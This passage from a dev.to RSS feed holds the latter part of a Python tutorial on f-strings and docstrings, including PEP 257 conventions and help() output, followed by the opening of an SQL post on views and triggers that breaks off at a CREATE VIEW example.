Thus, the output is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;My&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;Jane&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;I&lt;/span&gt; &lt;span class="n"&gt;am&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt; &lt;span class="n"&gt;years&lt;/span&gt; &lt;span class="n"&gt;old&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Notice how readable and concise the string is now that we’re using the f-string syntax. You don’t need operators or methods anymore. You just embed the desired objects or expressions in your string literal using curly brackets.&lt;/p&gt;

&lt;p&gt;You can embed almost any Python expression in an f-string. This allows you to do some nifty things like the following:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Jane&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;25&lt;/span&gt;

&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Hello, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upper&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;! You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; years old.&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In the example above, you embed a call to the .upper() string method in the first replacement field. Python runs the method call and inserts the uppercased name into the resulting string. The output will be:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;Hello&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;JANE&lt;/span&gt;&lt;span class="err"&gt;!&lt;/span&gt; &lt;span class="n"&gt;You&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re 25 years old.
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;F-strings are a bit faster than both the modulo operator (%) and the .format() method, thus are a better method to use when working with strings.&lt;br&gt;
More detailed info on f-strings can be found here: &lt;a href="https://docs.python.org/3/reference/lexical_analysis.html#f-strings" rel="noopener noreferrer"&gt;https://docs.python.org/3/reference/lexical_analysis.html#f-strings&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  DocStrings
&lt;/h2&gt;

&lt;p&gt;A docstring is a string literal that occurs as the first statement in a module, function, class, or method definition. It is used to explain what something does and can be accessed via the .&lt;strong&gt;doc&lt;/strong&gt; attribute. All modules should normally have docstrings, and all functions and classes exported by a module should also have docstrings. String literals occurring elsewhere in Python code may also act as documentation. They are not recognized by the Python bytecode compiler and are not accessible as runtime object attributes (i.e. not assigned to &lt;strong&gt;doc&lt;/strong&gt;).&lt;/p&gt;

&lt;p&gt;Conventions for writing clear, consistent docstrings are outlined in PEP 257. They include:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Using triple quotes ("""Docstring""") even for one-liners.&lt;/li&gt;
&lt;li&gt;Starting with a summary line.&lt;/li&gt;
&lt;li&gt;Following the summary with a more detailed description (optional).&lt;/li&gt;
&lt;li&gt;Keeping the summary in the imperative mood (e.g., "Return the sum..." rather than "Returns...").&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  One-Line Docstrings
&lt;/h4&gt;

&lt;p&gt;Ideal for simple functions or methods, a one-line docstring should:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Be enclosed in triple double quotes (""").&lt;/li&gt;
&lt;li&gt;Fit on a single line.&lt;/li&gt;
&lt;li&gt;Begin with a capital letter and end with a period.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;y&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Return the sum of x and y.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;y&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Multi-Line Docstrings
&lt;/h4&gt;

&lt;p&gt;Multi-line docstrings start with a one-line summary, followed by a blank line, then a detailed description. The summary should be concise enough for indexing tools and clearly separated. The entire docstring should match the indentation of the code it documents.&lt;br&gt;
Docstrings should always be followed by a blank line, especially in classes, to visually separate them from methods. Avoid using uppercase argument names in docstrings; list each argument on its own line using correct case-sensitive identifiers.&lt;br&gt;
Different constructs have tailored docstring needs:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Scripts: Docstrings should serve as usage/help messages, explaining syntax, arguments, and environment variables.&lt;/li&gt;
&lt;li&gt;Modules: Should list exported objects (classes, functions, etc.) with brief summaries.&lt;/li&gt;
&lt;li&gt;Functions/Methods: Must describe behavior, arguments, return values, side effects, exceptions, and constraints.&lt;/li&gt;
&lt;li&gt;Classes: Should summarize behavior, public members, and subclassing interfaces. If subclassing is involved, describe differences and use “override” or “extend” where appropriate.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Example&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;complex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;real&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;imag&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Form a complex number.

    Keyword arguments:
    real -- the real part (default 0.0)
    imag -- the imaginary part (default 0.0)
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;imag&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;real&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mf"&gt;0.0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;complex_zero&lt;/span&gt;
    &lt;span class="bp"&gt;...&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Comments vs Docstrings
&lt;/h4&gt;

&lt;p&gt;Comments are descriptions that help programmers better understand the intent and functionality of the program. They are completely ignored by the Python interpreter.&lt;br&gt;
As mentioned above, Python docstrings are strings used right after the definition of a function, method, class, or module. They are used to document our code.&lt;/p&gt;

&lt;p&gt;We can access these docstrings using the doc attribute, for example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    A class to represent a person.
&lt;/span&gt;&lt;span class="gp"&gt;
    ...&lt;/span&gt;

&lt;span class="s"&gt;    Attributes
    ----------
    name : str
        first name of the person
    surname : str
        family name of the person
    age : int
        age of the person

    Methods
    -------
    info(additional=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="s"&gt;):
        Prints the person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;surname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Constructs all the necessary attributes for the person object.

        Parameters
        ----------
            name : str
                first name of the person
            surname : str
                family name of the person
            age : int
                age of the person
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;surname&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;surname&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Prints the person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age.

        If the argument &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;additional&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; is passed, then it is appended after the main info.

        Parameters
        ----------
        additional : str, optional
            More info to be displayed (default is None)

        Returns
        -------
        None
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;My name is &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;surname&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;. I am &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; years old.&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here, we can use the following code to access only the docstrings of the Person class:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;__doc__&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt; &lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;to&lt;/span&gt; &lt;span class="n"&gt;represent&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;

    &lt;span class="bp"&gt;...&lt;/span&gt;

    &lt;span class="n"&gt;Attributes&lt;/span&gt;
    &lt;span class="o"&gt;----------&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
        &lt;span class="n"&gt;first&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
    &lt;span class="n"&gt;surname&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
        &lt;span class="n"&gt;family&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
    &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;
        &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;

    &lt;span class="n"&gt;Methods&lt;/span&gt;
    &lt;span class="o"&gt;-------&lt;/span&gt;
    &lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;Prints&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can also use the help() function to read the docstrings associated with various objects. Using the previous example, we can use the help function on the person class as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nf"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Output&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;Help&lt;/span&gt; &lt;span class="n"&gt;on&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Person&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;module&lt;/span&gt; &lt;span class="n"&gt;__main__&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;builtins&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nb"&gt;object&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="nc"&gt;Person&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;surname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;to&lt;/span&gt; &lt;span class="n"&gt;represent&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="bp"&gt;...&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;Attributes&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="o"&gt;----------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;first&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;surname&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;family&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;age&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;Methods&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="o"&gt;-------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;additional&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;Prints&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s name and age.
 |  
 |  Methods defined here:
 |  
 |  __init__(self, name, surname, age)
 |      Constructs all the necessary attributes for the person object.
 |      
 |      Parameters
 |      ----------
 |          name : str
 |              first name of the person
 |          surname : str
 |              family name of the person
 |          age : int
 |              age of the person
 |  
 |  info(self, additional=&lt;/span&gt;&lt;span class="sh"&gt;''&lt;/span&gt;&lt;span class="s"&gt;)
 |      Prints the person&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;age&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;If&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;argument&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;additional&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;passed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;then&lt;/span&gt; &lt;span class="n"&gt;it&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="n"&gt;appended&lt;/span&gt; &lt;span class="n"&gt;after&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;Parameters&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="o"&gt;----------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;additional&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;optional&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;          &lt;span class="n"&gt;More&lt;/span&gt; &lt;span class="n"&gt;info&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;be&lt;/span&gt; &lt;span class="nf"&gt;displayed &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;Returns&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="o"&gt;-------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="bp"&gt;None&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="o"&gt;----------------------------------------------------------------------&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;Data&lt;/span&gt; &lt;span class="n"&gt;descriptors&lt;/span&gt; &lt;span class="n"&gt;defined&lt;/span&gt; &lt;span class="n"&gt;here&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;__dict__&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="n"&gt;dictionary&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;instance&lt;/span&gt; &lt;span class="nf"&gt;variables &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;defined&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;  
 &lt;span class="o"&gt;|&lt;/span&gt;  &lt;span class="n"&gt;__weakref__&lt;/span&gt;
 &lt;span class="o"&gt;|&lt;/span&gt;      &lt;span class="nb"&gt;list&lt;/span&gt; &lt;span class="n"&gt;of&lt;/span&gt; &lt;span class="n"&gt;weak&lt;/span&gt; &lt;span class="n"&gt;references&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="nf"&gt;object &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;defined&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here, we can see that the help() function retrieves the docstrings of the Person class along with the methods associated with that class.&lt;/p&gt;

&lt;p&gt;We can write docstring in many formats like the reStructured text (reST) format, Google format or the NumPy documentation format. To learn more, visit &lt;a href="https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format" rel="noopener noreferrer"&gt;https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format&lt;/a&gt;&lt;br&gt;
We can also generate documentation from docstrings using tools like Sphinx. To learn more, visit &lt;a href="https://www.sphinx-doc.org/en/master/" rel="noopener noreferrer"&gt;https://www.sphinx-doc.org/en/master/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>python</category>
    </item>
    <item>
      <title>Smarter Databases with SQL Views and Triggers</title>
      <dc:creator>James K.</dc:creator>
      <pubDate>Mon, 12 May 2025 08:50:32 +0000</pubDate>
      <link>https://dev.to/james_kariuki/smarter-databases-with-sql-views-and-triggers-4hkn</link>
      <guid>https://dev.to/james_kariuki/smarter-databases-with-sql-views-and-triggers-4hkn</guid>
      <description>&lt;p&gt;The majority of developers become proficient in SQL's fundamental CRUD operations, but that's like saying you're a pro driver just because you can brake and steer. The advanced toolkit of SQL, which includes views, triggers, indexes, and cursors, is explored in this article. These features turn your database from a basic storage container into a more responsive, intelligent system. The fundamentals of data manipulation are INSERT, SELECT, UPDATE, and DELETE, but we're going to learn how these sophisticated features let your database handle half of the work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Views
&lt;/h2&gt;

&lt;p&gt;A view in SQL is a virtual table that is based on the result set of a SQL SELECT query. It does not store the data itself but rather provides a way to access and manipulate the data stored in one or more tables. Views can be used to simplify complex queries, enhance security by restricting access to specific data (columns or rows), and present data in a specific format. Some advantages of using views are;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Simplify Complex Queries: Encapsulate complex joins and conditions into a single object.&lt;/li&gt;
&lt;li&gt;Enhance Security: Restrict access to specific columns or rows.&lt;/li&gt;
&lt;li&gt;Present Data Flexibly: Provide tailored data views for different users.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Views are used in queries like regular tables but do not contain data themselves; they fetch data from the underlying tables. They do not accept parameters and they can often be updated, but this depends on the complexity of the view. Some views are read-only.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Operations with Views
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Creating a View
&lt;/h4&gt;

&lt;p&gt;Views are created using the CREATE VIEW statement.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;VIEW&lt;/span&gt; &lt;span class="n"&gt;view_name&lt;/span&gt; &lt;span class="k"&gt;AS&lt;/span&gt;
